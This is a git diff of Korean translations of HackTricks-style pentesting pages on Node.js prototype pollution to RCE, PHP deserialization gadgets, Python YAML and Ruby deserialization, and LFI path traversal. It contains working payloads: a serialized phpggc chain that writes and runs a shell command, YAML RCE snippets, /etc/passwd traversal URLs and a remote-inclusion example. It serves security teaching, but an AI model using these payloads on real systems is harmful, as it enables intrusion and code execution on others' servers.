+또한 Lodash와 같은 라이브러리가 사용되는 시나리오에서는 프로토타입 오염(PP)을 통해 속성을 설정하는 것과 객체 내부에서 직접 설정하는 것이 또 다른 진단 접근 방식을 제공합니다. 만약 이러한 속성이 응답에서 생략된다면, 이는 Lodash가 병합하기 전에 대상 객체에서 속성의 존재를 확인하고 있음을 시사합니다.
 ```javascript
 {"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
 // If 'b' is the only property reflected, this indicates prototype pollution in Lodash
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
index aaead2b44..68cd81c86 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
@@ -41,7 +41,7 @@ var proc = fork("a_file.js")
 
 **PP2RCE**는 **Prototype Pollution to RCE** (원격 코드 실행)을 의미합니다.
 
-이 [**writeup**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)에 따르면, **`child_process`**의 어떤 메서드(예: `fork` 또는 `spawn` 등)를 사용하여 **프로세스가 생성**될 때, 새로운 env vars를 생성하기 위한 **프로토타입 오염 가젯**인 `normalizeSpawnArguments` 메서드가 호출됩니다:
+이 [**writeup**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)에 따르면, **`child_process`**의 일부 메서드(예: `fork` 또는 `spawn` 등)를 사용하여 **프로세스가 생성**될 때, 새로운 env vars를 생성하기 위한 **프로토타입 오염 가젯**인 `normalizeSpawnArguments` 메서드가 호출됩니다:
 ```javascript
 //See code in https://github.com/nodejs/node/blob/02aa8c22c26220e16616a88370d111c0229efe5e/lib/child_process.js#L638-L686
 
@@ -61,13 +61,13 @@ ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution
 }
 }
 ```
-코드를 확인해보면 **`.env` 속성을** **오염시킴으로써 `envPairs`**를 **독살**할 수 있는 것이 가능합니다.
+코드를 확인해보면 **`.env` 속성을** **오염시킴으로써** **`envPairs`**를 **독살**할 수 있는 것이 가능합니다.
 
 ### **`__proto__` 독살**
 
 > [!WARNING]
 > **`child_process`** 라이브러리의 **`normalizeSpawnArguments`** 함수가 작동하는 방식 때문에, 프로세스에 **새로운 env 변수를 설정하기 위해** 무언가를 호출할 때 **무엇이든 오염시키기만 하면** 됩니다.\
-> 예를 들어, `__proto__.avar="valuevar"`를 실행하면 프로세스는 `avar`라는 이름의 변수를 `valuevar` 값으로 가진 채로 생성됩니다.
+> 예를 들어, `__proto__.avar="valuevar"`를 실행하면 프로세스는 `avar`라는 이름의 변수를 `valuevar` 값으로 가진 상태로 생성됩니다.
 >
 > 그러나 **env 변수가 첫 번째가 되기 위해서는** **`.env` 속성을** **오염시켜야** 하며 (일부 방법에서만) 그 변수가 **첫 번째**가 됩니다 (공격을 허용함).
 >
@@ -122,9 +122,9 @@ var proc = fork("a_file.js")
 ```
 ## PP2RCE via env vars + cmdline
 
-이전과 유사한 페이로드가 [**이 글**](https://blog.sonarsource.com/blitzjs-prototype-pollution/)**에서** 제안되었습니다. 주요 차이점은 다음과 같습니다:
+이전과 유사한 페이로드가 [**이 글**](https://blog.sonarsource.com/blitzjs-prototype-pollution/)에서 제안되었습니다. 주요 차이점은 다음과 같습니다:
 
-- nodejs **payload**를 파일 `/proc/self/environ`에 저장하는 대신, **`/proc/self/cmdline`**의 argv0에 저장합니다.
+- nodejs **payload**를 파일 `/proc/self/environ`에 저장하는 대신, **`/proc/self/cmdline`**의 **argv0** 안에 저장합니다.
 - 그런 다음, **`NODE_OPTIONS`**를 통해 파일 `/proc/self/environ`을 요구하는 대신, **`/proc/self/cmdline`**을 요구합니다.
 ```javascript
 const { execSync, fork } = require("child_process")
@@ -228,7 +228,7 @@ var proc = execFile("/usr/bin/node")
 // Windows - not working
 ```
 **`execFile`**가 작동하려면 **반드시 node를 실행해야** NODE_OPTIONS가 작동합니다.\
-만약 **node**를 실행하지 않는다면, **환경 변수를 사용하여 실행을 변경**할 수 있는 방법을 찾아야 합니다.
+**node**를 실행하지 않는 경우, 실행 중인 것을 **환경 변수를 사용하여 변경**할 수 있는 방법을 찾아야 합니다.
 
 **다른** 기술들은 이 요구 사항 없이 **작동**합니다. 왜냐하면 **프로토타입 오염**을 통해 **실행되는 것**을 수정할 수 있기 때문입니다. (이 경우, `.shell`을 오염시킬 수 있더라도, 실행되는 것을 오염시킬 수는 없습니다).
 
@@ -236,7 +236,7 @@ var proc = execFile("/usr/bin/node")
 
 <details>
 
-<summary><code>fork</code> exploitation</summary>
+<summary><code>fork</code> 취약점</summary>
 ```javascript
 // environ trick - working
 // Working after kEmptyObject (fix)
@@ -463,7 +463,7 @@ var proc = spawnSync("something")
 
 ## 강제 스폰
 
-이전 예제에서는 가젯을 트리거하는 방법을 보았고, **`spawn`**을 호출하는 기능이 **존재해야** 합니다(무언가를 실행하기 위해 사용되는 모든 **`child_process`** 메서드는 이를 호출합니다). 이전 예제에서는 **코드의 일부**였지만, 코드가 **호출하지 않는다면** 어떻게 될까요?
+이전 예제에서는 가젯을 트리거하는 방법을 보았고, **`spawn`**을 호출하는 기능이 **존재해야** 한다는 것을 알았습니다 (무언가를 실행하기 위해 사용되는 모든 **`child_process`** 메서드는 이를 호출합니다). 이전 예제에서는 **코드의 일부**였지만, 코드가 **호출하지 않는다면** 어떻게 될까요?
 
 ### require 파일 경로 제어
 
@@ -474,7 +474,7 @@ var proc = spawnSync("something")
 - /opt/yarn-v1.22.19/preinstall.js
 - **아래에서 더 많은 파일 찾기**
 
-다음 간단한 스크립트는 **패딩 없이** **child_process**의 **호출**을 검색합니다(함수 내의 호출을 표시하지 않기 위해):
+다음 간단한 스크립트는 **패딩 없이** **child_process**의 **호출**을 검색합니다 (함수 내의 호출을 표시하지 않기 위해):
 ```bash
 find / -name "*.js" -type f -exec grep -l "child_process" {} \; 2>/dev/null | while read file_path; do
 grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
@@ -502,7 +502,7 @@ done
 > [!WARNING]
 > **이전 기술은** **사용자가 파일의 경로를 제어해야** 한다는 **전제 조건이 있습니다**. 하지만 이것이 항상 사실은 아닙니다.
 
-그러나 코드가 프로토타입 오염 후에 require를 실행할 경우, 경로를 **제어하지 않더라도** 프로토타입 오염을 악용하여 **다른 경로를 강제로 지정할 수 있습니다**. 따라서 코드 라인이 `require("./a_file.js")` 또는 `require("bytes")`와 같더라도 **오염된 패키지를 require하게 됩니다**.
+그러나 코드가 프로토타입 오염 후에 require를 실행할 경우, 경로를 **제어하지 않더라도** 프로토타입 오염을 악용하여 **다른 경로를 강제로 지정할 수 있습니다**. 따라서 코드 라인이 `require("./a_file.js")` 또는 `require("bytes")`와 같더라도 **오염된 패키지를 require할 것입니다**.
 
 따라서 프로토타입 오염 후에 require가 실행되고 spawn 함수가 없으면, 공격은 다음과 같습니다:
 
@@ -598,7 +598,7 @@ fork("/path/to/anything")
 #### 상대 require - 2
 
 {{#tabs}}
-{{#tab name="exploit"}}
+{{#tab name="익스플로잇"}}
 ```javascript
 // Create a file called malicious.js in /tmp
 // Contents of malicious.js in the other tab
@@ -668,9 +668,9 @@ require("./usage.js")
 프로토타입 오염은 접근하는 객체의 **속성**이 **정의되지 않은** 경우에만 작동합니다. **코드**에서 해당 **속성**이 **값**으로 **설정**되면 **덮어쓸 수 없습니다**.
 
 2022년 6월, [**이 커밋**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a)에서 var `options`는 `{}` 대신 **`kEmptyObject`**입니다. 이는 **프로토타입 오염**이 **`options`**의 **속성**에 영향을 미치는 것을 방지합니다.\
-최소한 v18.4.0부터 이 보호가 **구현**되었으며, 따라서 `spawn` 및 `spawnSync` **익스플로잇**은 더 이상 작동하지 않습니다 (옵션이 사용되지 않는 경우!).
+최소한 v18.4.0부터 이 보호가 **구현**되었으며, 따라서 `spawn` 및 `spawnSync` **익스플로잇**은 더 이상 작동하지 않습니다(옵션이 사용되지 않는 경우!).
 
-[**이 커밋**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9)에서는 vm 라이브러리의 **`contextExtensions`**의 **프로토타입 오염**이 **`{}`** 대신 **`kEmptyObject`**로 설정되어 **어느 정도 수정**되었습니다.
+[**이 커밋**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9)에서는 vm 라이브러리의 **`contextExtensions`**의 **프로토타입 오염**이 **`{}`** 대신 **`kEmptyObject`**로 설정하여 **어느 정도 수정**되었습니다.
 
 ### **Other Gadgets**
 
diff --git a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
index 0d76011e7..5475aac53 100644
--- a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
+++ b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-먼저, [**자동 로딩 클래스**](https://www.php.net/manual/en/language.oop5.autoload.php)가 무엇인지 확인해야 합니다.
+먼저, [**Autoloading Classes**](https://www.php.net/manual/en/language.oop5.autoload.php)가 무엇인지 확인해야 합니다.
 
 ## PHP deserialization + spl_autoload_register + LFI/Gadget
 
@@ -12,8 +12,8 @@
 
 - **deserialization**을 발견했지만 현재 앱 코드에 **gadget**이 **없습니다**
 - 다음과 같은 **`spl_autoload_register`** 함수를 악용하여 **`.php` 확장자를 가진 로컬 파일을 로드**할 수 있습니다
-- 이를 위해 클래스 이름이 **`$name`** 안에 들어가도록 deserialization을 사용합니다. 직렬화된 객체의 클래스 이름에 **"/" 또는 "."**를 사용할 수 없지만, **코드**는 **언더스코어**("\_")를 **슬래시**("/")로 **대체**합니다. 따라서 `tmp_passwd`와 같은 클래스 이름은 `/tmp/passwd.php`로 변환되고, 코드는 이를 로드하려고 시도합니다.\
-**gadget 예시**는: **`O:10:"tmp_passwd":0:{}`**
+- 이를 위해 클래스 이름이 **`$name`** 안에 들어가도록 deserialization을 사용합니다. 직렬화된 객체의 클래스 이름에 **"/" 또는 "."**를 사용할 수 없지만, **코드**는 **언더스코어**("\_")를 **슬래시**("/")로 **변경**합니다. 따라서 `tmp_passwd`와 같은 클래스 이름은 `/tmp/passwd.php`로 변환되고, 코드는 이를 로드하려고 시도합니다.\
+**gadget 예시**는: **`O:10:"tmp_passwd":0:{}`**입니다.
 ```php
 spl_autoload_register(function ($name) {
 
@@ -36,29 +36,29 @@ require __DIR__ . $filename;
 });
 ```
 > [!TIP]
-> 만약 **파일 업로드**가 가능하고 **`.php` 확장자**를 가진 파일을 업로드할 수 있다면, 이 기능을 **직접 악용**하여 이미 RCE를 얻을 수 있습니다.
+> **파일 업로드**가 가능하고 **`.php` 확장자**를 가진 파일을 업로드할 수 있다면, 이 기능을 **직접 악용**하여 이미 RCE를 얻을 수 있습니다.
 
 내 경우에는 그런 것이 없었지만, **같은 컨테이너** 안에 **`phpggc` 가젯에 취약한 라이브러리를 가진 다른 composer 웹 페이지가 있었습니다.**
 
-- 이 다른 라이브러리를 로드하려면, 먼저 **그 다른 웹 앱의 composer 로더를 로드해야** 합니다 (현재 애플리케이션의 로더는 다른 애플리케이션의 라이브러리에 접근할 수 없습니다). **애플리케이션의 경로를 알고** 있다면, **`O:28:"www_frontend_vendor_autoload":0:{}`**를 사용하여 이를 매우 쉽게 달성할 수 있습니다. (내 경우, composer 로더는 `/www/frontend/vendor/autoload.php`에 있었습니다.)
-- 이제 **다른 앱의 composer 로더를 로드**할 수 있으므로, **사용할 `phpgcc`** **페이로드를 생성할** 시간입니다. 내 경우, **`Guzzle/FW1`**을 사용하여 **파일 시스템 내의 모든 파일을 쓸 수** 있었습니다.
-- 참고: **생성된 가젯이 작동하지 않았습니다.** 작동하게 하려면 **`chain.php`** 페이로드를 **수정**하고 **모든 속성**을 **private에서 public으로** 설정했습니다. 그렇지 않으면, 문자열을 역직렬화한 후 생성된 객체의 속성에 값이 없었습니다.
-- 이제 **다른 앱의 composer 로더를 로드**할 방법과 **작동하는 phpggc 페이로드**가 있지만, **가젯이 사용될 때 로더가 로드되도록 동일한 요청에서 이를 수행해야** 합니다. 이를 위해 두 개의 객체가 포함된 직렬화된 배열을 보냈습니다:
-- **먼저 로더가 로드되고 그 다음 페이로드가 보이는 것을 확인할 수 있습니다.**
+- 이 다른 라이브러리를 로드하려면, 먼저 **그 다른 웹 앱의 composer 로더를 로드해야** 합니다 (현재 애플리케이션의 로더는 다른 애플리케이션의 라이브러리에 접근할 수 없습니다). **애플리케이션의 경로를 알고** 있다면, **`O:28:"www_frontend_vendor_autoload":0:{}`**를 사용하여 매우 쉽게 이를 달성할 수 있습니다. (내 경우, composer 로더는 `/www/frontend/vendor/autoload.php`에 있었습니다.)
+- 이제 **다른 앱의 composer 로더를 로드**할 수 있으므로, **사용할 `phpgcc`** **페이로드를 생성할** 시간입니다. 내 경우에는 **`Guzzle/FW1`**을 사용하여 **파일 시스템 내의 모든 파일을 쓸 수** 있었습니다.
+- 주의: **생성된 가젯이 작동하지 않았습니다.** 작동하게 하려면 **`chain.php`**의 phpggc 페이로드를 **수정**하고 **모든 속성**을 **private에서 public으로** 설정했습니다. 그렇지 않으면 문자열을 역직렬화한 후 생성된 객체의 속성에 값이 없었습니다.
+- 이제 **다른 앱의 composer 로더를 로드할 방법**이 생겼고 **작동하는 phpggc 페이로드**도 있지만, **가젯이 사용될 때 로더가 로드되도록 동일한 요청에서 이를 수행해야** 합니다. 이를 위해 두 객체가 포함된 직렬화된 배열을 보냈습니다:
+- **먼저 로더가 로드되고 그 다음 페이로드가 로드되는** 것을 볼 수 있습니다.
 ```php
 a:2:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}}
 ```
-- 이제 **파일을 생성하고 쓸 수** 있지만, 사용자가 **웹 서버 내의 어떤 폴더에도 쓸 수는 없습니다**. 따라서 페이로드에서 볼 수 있듯이, PHP가 **`system`**을 호출하여 **base64**로 **`/tmp/a.php`**에 생성됩니다. 그런 다음, 우리는 **다른 웹앱의 composer 로더를 로드하기 위해 LFI에 사용했던 첫 번째 유형의 페이로드를 재사용할 수 있습니다** **생성된 `/tmp/a.php`** 파일을 로드합니다. 이를 역직렬화 가젯에 추가하기만 하면 됩니다:&#x20;
+- 이제 **파일을 생성하고 쓸 수** 있지만, 사용자가 **웹 서버 내의 어떤 폴더에도 쓸 수는 없습니다**. 따라서 페이로드에서 볼 수 있듯이, PHP가 **`system`**을 호출하여 **base64**로 **`/tmp/a.php`**에 생성됩니다. 그런 다음, 우리는 **다른 웹앱의 composer 로더를 로드하기 위해 LFI로 사용했던 첫 번째 유형의 페이로드를 재사용할 수 있습니다** **생성된 `/tmp/a.php`** 파일을 로드합니다. 이를 역직렬화 가젯에 추가하기만 하면 됩니다:&#x20;
 ```php
 a:3:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}s:6:"Extra3";O:5:"tmp_a":0:{}}
 ```
 **페이로드 요약**
 
-- **다른 웹앱의 composer autoload**를 동일한 컨테이너에서 로드합니다.
-- **phpggc 가젯**을 로드하여 다른 웹앱의 라이브러리를 악용합니다 (역직렬화에 취약한 초기 웹앱은 라이브러리에 가젯이 없었습니다).
-- 가젯은 **/tmp/a.php**에 악성 명령이 포함된 PHP 페이로드가 있는 파일을 **생성**합니다 (웹앱 사용자는 어떤 웹앱의 폴더에도 쓸 수 없습니다).
-- 페이로드의 마지막 부분은 **생성된 PHP 파일을 로드**하여 명령을 실행합니다.
+- **같은 컨테이너에 있는 다른 웹앱의 composer autoload를 로드합니다.**
+- **phpggc 가젯을 로드하여 다른 웹앱의 라이브러리를 악용합니다.** (역직렬화에 취약한 초기 웹앱은 라이브러리에 가젯이 없었습니다.)
+- 가젯은 **/tmp/a.php에 악성 명령이 포함된 PHP 페이로드가 있는 파일을 생성합니다.** (웹앱 사용자는 어떤 웹앱의 폴더에도 쓸 수 없습니다.)
+- 페이로드의 마지막 부분은 **생성된 PHP 파일을 로드하여 명령을 실행합니다.**
 
-나는 이 **역직렬화를 두 번 호출해야 했습니다**. 내 테스트에서 첫 번째로 `/tmp/a.php` 파일이 생성되었지만 로드되지 않았고, 두 번째로 올바르게 로드되었습니다.
+저는 이 **역직렬화를 두 번 호출해야 했습니다.** 제 테스트에서 첫 번째로 `/tmp/a.php` 파일이 생성되었지만 로드되지 않았고, 두 번째로는 제대로 로드되었습니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/deserialization/python-yaml-deserialization.md b/src/pentesting-web/deserialization/python-yaml-deserialization.md
index b9138051a..e7ad76c85 100644
--- a/src/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/src/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -22,7 +22,7 @@ print(yaml.dump(range(1,10)))
 - 10
 - 1
 ```
-**튜플**은 원시 데이터 유형이 아니므로 **직렬화**되었습니다. **범위**(builtins에서 가져옴)도 마찬가지입니다.
+**튜플**은 원시 데이터 유형이 아니므로 **직렬화**되었습니다. **range**도 마찬가지입니다(내장 함수에서 가져옴).
 
 ![](<../../images/image (1040).png>)
 
@@ -45,7 +45,7 @@ print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
 #The other ways to load data will through an error as they won't even attempt to
 #deserialize the python object
 ```
-이전 코드는 직렬화된 파이썬 클래스를 로드하기 위해 **unsafe_load**를 사용했습니다. 이는 **버전 >= 5.1**에서 load()에 Loader가 지정되지 않거나 Loader=SafeLoader로 설정된 경우, **직렬화된 파이썬 클래스나 클래스 속성을 역직렬화하는 것을 허용하지 않기 때문입니다.**
+이전 코드는 직렬화된 파이썬 클래스를 로드하기 위해 **unsafe_load**를 사용했습니다. 이는 **버전 >= 5.1**에서 load()에 Loader가 지정되지 않거나 Loader=SafeLoader로 설정된 경우 **직렬화된 파이썬 클래스나 클래스 속성을 역직렬화하는 것을 허용하지 않기 때문입니다.**
 
 ### 기본 익스플로잇
 
@@ -77,7 +77,7 @@ state: !!python/tuple
 state:
 update: !!python/name:exec
 ```
-또는 **@ishaack가 제공한 이 한 줄 코드**를 사용할 수도 있습니다:
+또는 **@ishaack가 제공한 이 한 줄**을 사용할 수도 있습니다:
 ```yaml
 !!python/object/new:str {
 state:
@@ -91,7 +91,7 @@ state:
 
 ## RCE
 
-사용자 정의 페이로드는 **PyYAML** 또는 **ruamel.yaml**과 같은 Python YAML 모듈을 사용하여 생성할 수 있습니다. 이러한 페이로드는 적절한 세척 없이 신뢰할 수 없는 입력을 역직렬화하는 시스템의 취약점을 악용할 수 있습니다.
+사용자 정의 페이로드는 **PyYAML** 또는 **ruamel.yaml**과 같은 Python YAML 모듈을 사용하여 생성할 수 있습니다. 이러한 페이로드는 적절한 정화 없이 신뢰할 수 없는 입력을 역직렬화하는 시스템의 취약점을 악용할 수 있습니다.
 ```python
 import yaml
 from yaml import UnsafeLoader, FullLoader, Loader
@@ -135,7 +135,7 @@ cat /tmp/example_yaml
 - cat
 - /root/flag.txt
 ```
-### 참고문헌
+### References
 
 - [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
 - [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html)
diff --git a/src/pentesting-web/deserialization/ruby-_json-pollution.md b/src/pentesting-web/deserialization/ruby-_json-pollution.md
index 196b40d5c..3eb8f5abe 100644
--- a/src/pentesting-web/deserialization/ruby-_json-pollution.md
+++ b/src/pentesting-web/deserialization/ruby-_json-pollution.md
@@ -6,14 +6,14 @@
 
 ## 기본 정보
 
-바디에 해시 가능하지 않은 배열과 같은 값을 보내면 `_json`이라는 새로운 키에 추가됩니다. 그러나 공격자가 원하는 임의의 값으로 `_json`이라는 값을 바디에 설정할 수도 있습니다. 그런 다음, 예를 들어 백엔드가 매개변수의 진위를 확인하지만 `_json` 매개변수를 사용하여 어떤 작업을 수행하는 경우, 권한 우회를 수행할 수 있습니다.
+본문에 해시할 수 없는 일부 값(예: 배열)을 전송하면 `_json`이라는 새 키에 추가됩니다. 그러나 공격자가 원하는 임의의 값으로 `_json`이라는 값을 본문에 설정하는 것도 가능합니다. 그런 다음, 예를 들어 백엔드가 매개변수의 진위를 확인하지만 `_json` 매개변수를 사용하여 어떤 작업을 수행하는 경우, 권한 우회를 수행할 수 있습니다.
 ```json
 {
 "id": 123,
 "_json": [456, 789]
 }
 ```
-## References
+## 참고 문헌
 
 - [https://nastystereo.com/security/rails-_json-juggling-attack.html](https://nastystereo.com/security/rails-_json-juggling-attack.html)
 
diff --git a/src/pentesting-web/deserialization/ruby-class-pollution.md b/src/pentesting-web/deserialization/ruby-class-pollution.md
index 5c150e834..e513eb22c 100644
--- a/src/pentesting-web/deserialization/ruby-class-pollution.md
+++ b/src/pentesting-web/deserialization/ruby-class-pollution.md
@@ -144,15 +144,15 @@ JSONMergerApp.run(json_input)
 ### 설명
 
 1. **권한 상승**: `authorize` 메서드는 `to_s`가 "Admin"을 반환하는지 확인합니다. JSON을 통해 새로운 `to_s` 속성을 주입함으로써 공격자는 `to_s` 메서드가 "Admin"을 반환하게 만들어 무단 권한을 부여할 수 있습니다.
-2. **원격 코드 실행**: `health_check`에서 `instance_eval`은 `protected_methods`에 나열된 메서드를 실행합니다. 공격자가 사용자 정의 메서드 이름(예: `"puts 1"`)을 주입하면 `instance_eval`이 이를 실행하여 **원격 코드 실행(RCE)**로 이어집니다.
+2. **원격 코드 실행**: `health_check`에서 `instance_eval`은 `protected_methods`에 나열된 메서드를 실행합니다. 공격자가 사용자 정의 메서드 이름(예: `"puts 1"`)을 주입하면, `instance_eval`이 이를 실행하여 **원격 코드 실행(RCE)**로 이어집니다.
 1. 이는 해당 속성의 문자열 값을 실행하는 **취약한 `eval` 명령어**가 있기 때문에 가능합니다.
-3. **영향 제한**: 이 취약점은 개별 인스턴스에만 영향을 미치며, 다른 `User` 및 `Admin` 인스턴스에는 영향을 주지 않아 악용 범위를 제한합니다.
+3. **영향 제한**: 이 취약점은 개별 인스턴스에만 영향을 미치며, 다른 `User` 및 `Admin` 인스턴스에는 영향을 주지 않아, 악용 범위를 제한합니다.
 
 ### 실제 사례 <a href="#real-world-cases" id="real-world-cases"></a>
 
 ### ActiveSupport의 `deep_merge`
 
-기본적으로 취약하지 않지만 다음과 같은 것으로 취약해질 수 있습니다:&#x20;
+기본적으로 취약하지 않지만 다음과 같은 것으로 취약하게 만들 수 있습니다:&#x20;
 ```ruby
 # Method to merge additional data into the object using ActiveSupport deep_merge
 def merge_with(other_object)
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index 4a81efa2d..4b5aa508a 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -23,10 +23,10 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}
 
-`/`를 `\`로 변경해 보세요.\
-`../../../../../`를 추가해 보세요.
+또한 `/`를 `\`로 변경해 보세요.\
+또한 `../../../../../`를 추가해 보세요.
 
-파일 /etc/password를 찾기 위해 여러 기술을 사용하는 목록은 [여기](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)에서 찾을 수 있습니다.
+파일 /etc/password를 찾기 위해 여러 기술을 사용하는 목록(취약점이 존재하는지 확인하기 위해)은 [여기](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)에서 찾을 수 있습니다.
 
 ### **Windows**
 
@@ -34,18 +34,18 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}
 
-`/`를 `\`로 변경해 보세요.\
-`C:/`를 제거하고 `../../../../../`를 추가해 보세요.
+또한 `/`를 `\`로 변경해 보세요.\
+또한 `C:/`를 제거하고 `../../../../../`를 추가해 보세요.
 
-파일 /boot.ini를 찾기 위해 여러 기술을 사용하는 목록은 [여기](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)에서 찾을 수 있습니다.
+파일 /boot.ini를 찾기 위해 여러 기술을 사용하는 목록(취약점이 존재하는지 확인하기 위해)은 [여기](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)에서 찾을 수 있습니다.
 
 ### **OS X**
 
 리눅스의 LFI 목록을 확인하세요.
 
-## 기본 LFI 및 우회
+## Basic LFI and bypasses
 
-모든 예제는 로컬 파일 포함(Local File Inclusion)을 위한 것이지만 원격 파일 포함(Remote File Inclusion)에도 적용될 수 있습니다 (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt>/)).
+모든 예시는 Local File Inclusion을 위한 것이지만 Remote File Inclusion에도 적용될 수 있습니다 (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt>/)).
 ```
 http://example.com/index.php?page=../../../etc/passwd
 ```
@@ -61,7 +61,7 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
 ```
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
-이것은 **PHP 5.4부터 해결되었습니다**
+이것은 **PHP 5.4부터 해결되었습니다.**
 
 ### **인코딩**
 
@@ -72,7 +72,7 @@ http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
-### 기존 폴더에서
+### From existent folder
 
 아마도 백엔드가 폴더 경로를 확인하고 있습니다:
 ```python
@@ -86,7 +86,7 @@ http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
 ```bash
 http://example.com/index.php?page=../../../etc/passwd # depth of 3
 ```
-2. **폴더 탐색:** 의심되는 폴더의 이름(예: `private`)을 URL에 추가한 다음 `/etc/passwd`로 돌아갑니다. 추가 디렉토리 수준은 깊이를 하나 증가시켜야 합니다:
+2. **폴더 탐색:** 의심되는 폴더의 이름(예: `private`)을 URL에 추가한 다음 `/etc/passwd`로 돌아갑니다. 추가 디렉토리 레벨은 깊이를 하나 증가시켜야 합니다:
 ```bash
 http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
 ```
@@ -107,9 +107,9 @@ PHP에서는 파일 시스템의 특성으로 인해 파일 경로의 다양한
 
 - `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, 및 `/etc/passwd/`는 모두 동일한 경로로 처리됩니다.
 - 마지막 6자가 `passwd`일 때, `/`를 추가해도(`passwd/`) 대상 파일은 변경되지 않습니다.
-- 마찬가지로, 파일 경로에 `.php`가 추가될 경우(`shellcode.php`와 같이), 끝에 `/.`을 추가해도 접근하는 파일은 변경되지 않습니다.
+- 마찬가지로, 파일 경로에 `.php`가 추가될 경우(`shellcode.php`와 같이), 끝에 `/.`를 추가해도 접근하는 파일은 변경되지 않습니다.
 
-제공된 예시는 민감한 내용(사용자 계정 정보)으로 인해 일반적인 대상인 `/etc/passwd`에 접근하기 위해 경로 잘림을 활용하는 방법을 보여줍니다:
+제공된 예제는 민감한 내용(사용자 계정 정보)으로 인해 일반적인 대상인 `/etc/passwd`에 접근하기 위해 경로 잘림을 활용하는 방법을 보여줍니다:
 ```
 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
@@ -123,7 +123,7 @@ http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/pas
 
 - **점 세그먼트 및 추가 문자 사용**: 탐색 시퀀스(`../`)와 추가 점 세그먼트 및 문자를 결합하여 파일 시스템을 탐색할 수 있으며, 서버에 의해 추가된 문자열을 효과적으로 무시할 수 있습니다.
 - **필요한 탐색 횟수 결정**: 시행착오를 통해 루트 디렉토리로 탐색하고 `/etc/passwd`로 이동하는 데 필요한 정확한 `../` 시퀀스 수를 찾을 수 있으며, 이때 추가된 문자열(예: `.php`)은 중화되지만 원하는 경로(`/etc/passwd`)는 그대로 유지됩니다.
